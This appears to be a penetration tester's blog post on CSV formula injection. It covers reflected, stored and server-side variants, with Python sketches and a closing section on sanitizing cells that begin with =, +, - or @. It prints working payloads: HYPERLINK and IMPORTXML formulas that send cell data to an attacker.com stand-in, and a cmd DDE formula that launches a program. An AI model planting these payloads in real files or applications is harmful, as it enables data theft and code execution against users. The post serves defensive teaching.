A few years back I was testing an application with CSV export functionality and I noticed something weird. When I clicked the export button, the application submitted a request with the CSV data in the POST body. That data was then used to generate the file that was downloaded. This behavior piqued my interest, so I began to play with the request, and I confirmed that anything I supplied in the POST body would be reflected in the downloaded file. This began my research into an often overlooked but dangerous vulnerability: CSV Formula Injection.
By design, most spreadsheet applications such as Microsoft Excel allow users to create formulas within cells. This allows the application to do mathematical calculations for you, which is pretty much the main purpose of a spreadsheet. Unfortunately, this functionality can be easily exploited by attackers and the results can be catastrophic. With a simple injection, an attacker can exfiltrate the contents of a file to a remote server or even execute code on the victim’s machine. CSV Formula Injection occurs when untrusted input is embedded in a CSV file and the spreadsheet application that opens the file interprets that input as a formula to be computed.
How Attackers Can Use Your Server to Pwn Users
Many web applications have functionality that allows users to import and export data in CSV format and, in my experience, almost none of them perform any sort of validation on the data contained within the file. Why would they? According to RFC 4180:
"CSV files contain passive text data that should not pose any risks. However, it is possible in theory that malicious binary data may be included in order to exploit potential buffer overruns in the program processing CSV data. Additionally, private data may be shared via this format (which of course applies to any text data)."
So if the RFC says the data is passive and essentially poses no risk, why would you not trust that all CSV data is safe? Well, to put it plainly, the RFC is incorrect.
As I mentioned earlier, most spreadsheet applications allow users to create formulas which perform calculations. However, what most people don’t know is that these formulas are capable of a lot more. You are able to, for instance, include hyperlinks within a CSV file. An attacker can use this to create a malicious payload which is capable of exfiltrating data to a remote server. For example, an attacker could place the following formula into a CSV file:
=HYPERLINK("https://www.attacker.com?leak="&A2&B2,"Error: Click here for additional information")
This payload plays on the trust relationship that a victim will have with the server and the content provided by it. Once this payload has been placed, the attacker just has to wait for their victim to take the bait. When the victim downloads and opens the file, they will see the attacker’s error message and, given that the file came from a trusted source, will likely click on the cell to investigate the error:
Figure 1 - When the user opens the file they will see the attacker's "Error" message displayed as valid content.
Once the victim clicks on the link, their browser will open and submit a request to the attacker’s domain along with the exfiltrated values from the specified cells:
Figure 2 - The user's data being exfiltrated to the attacker's domain.
While this particular attack method is a bit clunky, it primarily serves to show that the “passive” data included in a CSV file can easily be used for nefarious ends. More refined injections exist and are capable of silently exfiltrating data. For example, the following code will quietly exfiltrate content from a Google Sheets file:
=IMPORTXML(CONCAT(""http://attacker.com?leak="", CONCATENATE(A2:B2)), ""//a"")
It is important to note: these injections do not raise any warning from the spreadsheet application. As far as the application is concerned, all of the data in the file is safe.
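To see how such a formula ends up inside a file, here is a minimal Python sketch. The column names and the "alice" row are illustrative assumptions, not taken from any real application. It passes the formula, written as it would be typed into a cell, through the standard `csv` module, which treats it like any other text value.

```python
import csv
import io

# The formula as it would be typed into a cell (plain, undoubled quotes).
formula = '=IMPORTXML(CONCAT("http://attacker.com?leak=", CONCATENATE(A2:B2)), "//a")'

buffer = io.StringIO()
writer = csv.writer(buffer)
writer.writerow(["name", "note"])    # hypothetical header row
writer.writerow(["alice", formula])  # hypothetical data row carrying the payload

csv_text = buffer.getvalue()
print(csv_text)

# Reading the file back yields the original formula, unchanged.
parsed_rows = list(csv.reader(io.StringIO(csv_text)))
```

Because the formula contains commas and quotation marks, the writer wraps the field in quotes and doubles the inner ones. That is ordinary CSV escaping: it keeps the file well-formed, but the value is still a live formula once a spreadsheet parses it.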
In addition to being able to exfiltrate data, attackers can also exploit CSV formulas to execute malicious code on a victim’s computer. Once again, this attack leverages the formula functionality, but this time the following injection will execute code which launches the victim’s calculator:
Figure 3 - The victim's Calculator application being launched by an Excel Formula.
Now, to be fair, modern implementations of Microsoft Excel do present the user with the following warnings:
Figure 4 - Warning messages displayed prior to launching executables.
However, we are again talking about data which has been received from a trusted source. Therefore, the probability that a victim will accept these warnings and allow the formula to run is greatly increased. Also, if the attacker couples this exploit with a well-crafted social engineering attack, they will almost undoubtedly succeed. Now what happens if the payload doesn’t launch the calculator, but instead installs a keylogger or a reverse shell? And what if the victim is on a corporate network with access to sensitive internal data? Suddenly this “passive” CSV data poses a very real risk.
The Attack Surface
During the past few years I have encountered three different ways in which I have been able to exploit this vulnerability: Reflected, Stored, and Server-Side Execution.
Reflected: This is the most common method of exploiting CSV Formula Injection that I have encountered. Reflected CSV Formula Injection occurs when an application uses data supplied in a request to generate a CSV file which the user downloads. Take, for example, the following GET request:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0
Similar to Reflected Cross-Site Scripting, an attacker would simply need to trick a victim into submitting this request containing the malicious payload, for example through a link in an email, forum post, or blog article. The attacker will likely need to pair this vulnerability with a social engineering attack such as spear phishing in order to be successful, because the victim has to be convinced that the link and the subsequently downloaded file are trustworthy and legitimate. However, once the attacker’s payload has been delivered and executed, the repercussions could be devastating.
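The reflected flow can be sketched in a few lines of Python. Everything named here is hypothetical: the `export_from_url` handler, the `app.example` host, and the `name` and `comment` parameters are stand-ins for whatever the real application exposes. The point is only that a value taken from the request lands in the generated file untouched.

```python
import csv
import io
from urllib.parse import parse_qs, quote, urlsplit

def export_from_url(url: str) -> str:
    """Hypothetical vulnerable handler: copies query parameters straight into a CSV."""
    params = parse_qs(urlsplit(url).query)
    buffer = io.StringIO()
    writer = csv.writer(buffer)
    writer.writerow(["name", "comment"])
    writer.writerow([
        params.get("name", [""])[0],
        params.get("comment", [""])[0],
    ])
    return buffer.getvalue()

# The attacker URL-encodes the payload and hides it in a link sent to the victim.
payload = ('=HYPERLINK("https://www.attacker.com?leak="&A2&B2,'
           '"Error: Click here for additional information")')
malicious_link = "https://app.example/export?name=bob&comment=" + quote(payload, safe="")

reflected_csv = export_from_url(malicious_link)
reflected_rows = list(csv.reader(io.StringIO(reflected_csv)))
```

Nothing in this sketch is stored on the server. The payload lives only in the link, which is why the attacker has to get the victim to follow it.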
Stored: This attack scenario, though less common, is still fairly prevalent and has a greater probability of success. Stored CSV Formula Injection occurs either when user-supplied data is stored in an application and later used to generate a CSV file, or when users are allowed to upload files containing CSV data which can later be downloaded by other users. A common example is administrative functionality with which an Admin is able to export a list of users to a CSV file. If a malicious user changes their name to “=cmd|'/C calc.exe'!Z0” then once the Admin exports the user list and opens this file, the attacker’s payload will execute.
Another common example is seen in applications which enable users to upload and share documents, such as collaboration applications. In this scenario, the attacker simply needs to create a malicious CSV file containing their payload, upload this file to the server, and then wait for their victims to download and open it. Again, in both scenarios the attacker is able to play off the trust relationship which users have with the application. The data is coming from the trusted application, so why wouldn’t it be safe?
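The user-export case might look roughly like the following Python sketch. The `users` records and the `export_users` function are hypothetical and stand in for whatever storage and export code an application actually uses.

```python
import csv
import io

# Hypothetical stored records; the second user has set their name to a payload.
users = [
    {"id": 1, "name": "Alice Admin", "email": "alice@example.com"},
    {"id": 2, "name": "=cmd|'/C calc.exe'!Z0", "email": "mallory@example.com"},
]

def export_users(records) -> str:
    """Naive export: every stored value is written to the CSV as-is."""
    buffer = io.StringIO()
    writer = csv.DictWriter(buffer, fieldnames=["id", "name", "email"])
    writer.writeheader()
    writer.writerows(records)
    return buffer.getvalue()

exported = export_users(users)
print(exported)
```

The payload contains no commas or double quotes, so the writer does not even quote it. It sits in the exported file exactly as the attacker typed it, waiting for the Admin to open the file in a spreadsheet.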
Server-Side Execution: This final attack scenario is something I have only encountered once, but I figured it was worth mentioning. In one application which I tested, users were allowed to upload CSV files. These files could then be rendered and viewed in the application, typically using a third-party utility/application, or by embedding the user-supplied data into the webpage without properly sanitizing the data. This allowed me to place malicious code in the CSV file which resulted in Cross-Site Scripting (attempts at Remote Code Execution were not successful in this case, but this vulnerability could have led to RCE).
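For the case where CSV data is embedded into a webpage, a minimal sketch of the missing sanitization step could look like this. The `csv_to_html_table` helper and the sample upload are assumptions made for illustration; the application I tested is not shown here, and a real renderer would likely rely on a templating engine's built-in escaping instead.

```python
import csv
import html
import io

def csv_to_html_table(csv_text: str) -> str:
    """Render CSV rows as an HTML table, escaping every cell before embedding it."""
    lines = ["<table>"]
    for row in csv.reader(io.StringIO(csv_text)):
        cells = "".join(f"<td>{html.escape(cell)}</td>" for cell in row)
        lines.append(f"<tr>{cells}</tr>")
    lines.append("</table>")
    return "\n".join(lines)

# Hypothetical uploaded file with script markup in one cell.
uploaded = "name,comment\r\nmallory,<script>alert(1)</script>\r\n"
rendered = csv_to_html_table(uploaded)
print(rendered)
```

With the `html.escape` call removed, the script tag would be emitted verbatim into the page, which is the Cross-Site Scripting condition described above.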
Shut it Down
Now that we have seen how attackers can use an application’s CSV import/export functionality to cause some pretty serious damage, I want to go over how to stop these attacks. Thankfully, preventing this attack is as simple as blocking a few key characters. Every formula must begin with one of four special characters, and if you prevent cell values from starting with them then you mitigate this vulnerability:
Equals to (=)
Plus (+)
Minus (-)
At (@)
These characters can either be sanitized (similar to XSS prevention), or the server can inspect an uploaded file and reject it if it contains any of the disallowed characters. This helps ensure that the attacker’s payload is never successfully delivered. However, it is important to note that this approach blocks any CSV file containing formulas, including benign ones.
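Both options can be sketched in Python as follows. This is an illustration under stated assumptions rather than a complete defense: the character set is assumed to be the commonly cited =, +, - and @, the apostrophe prefix in `neutralize` is one common way of making a spreadsheet treat a value as text, and all function names are hypothetical.

```python
import csv
import io

# Assumed set of characters that can start a formula.
FORMULA_PREFIXES = ("=", "+", "-", "@")

def is_formula_like(cell: str) -> bool:
    """True if the cell value starts with a formula-triggering character."""
    return cell.startswith(FORMULA_PREFIXES)

def neutralize(cell: str) -> str:
    """Option 1 (sanitize): prefix risky cells with an apostrophe on export."""
    return "'" + cell if is_formula_like(cell) else cell

def upload_is_allowed(csv_text: str) -> bool:
    """Option 2 (reject): refuse any uploaded file with a formula-like cell."""
    return not any(
        is_formula_like(cell)
        for row in csv.reader(io.StringIO(csv_text))
        for cell in row
    )

safe_name = neutralize("=cmd|'/C calc.exe'!Z0")
clean_ok = upload_is_allowed("name,comment\r\nalice,hello\r\n")
bad_ok = upload_is_allowed("name,comment\r\nmallory,=1+1\r\n")
```

Note that `is_formula_like("-5")` is also true, so a plain negative number gets the same treatment as a payload. That is the trade-off mentioned above: the check cannot tell benign content from malicious content, it only looks at the first character.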